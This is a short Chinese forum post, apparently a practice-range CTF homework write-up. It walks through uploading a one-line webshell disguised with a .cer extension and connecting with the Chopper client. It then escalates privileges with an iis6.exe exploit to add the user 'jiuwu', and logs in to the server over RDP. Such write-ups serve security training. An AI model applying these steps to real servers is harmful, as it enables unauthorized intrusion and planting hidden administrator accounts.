靶场第六题 九五作业

九五   ·   发表于 2018-07-31 17:17:48   ·   CTF&WP专版

通过第五题进入了后台找到产品管理可以修改上传文件

制作了一句话木马程序,把后缀名改为cer可以上传

之后用菜刀连接,但是没有权限访问C盘

通过E:5\admin\Databackup\打开CMD

输入命令whoima,拒绝访问

输入命令iis6.exe "net user jiuwu 1234 /add"

net user发现成功添加用户

mstsc /admin命令,远程连接桌面120.203.13.75

使用用户名jiuwu,密码1234 就可以登陆到网站服务器

打赏我,让我更有动力~

0 Reply   |  Until 2018-7-31 | 514 View
LoginCan Publish Content
返回顶部 投诉反馈

掌控者 © 2016 - 2021. All Rights Reserved. 掌控者

Powered by 掌控者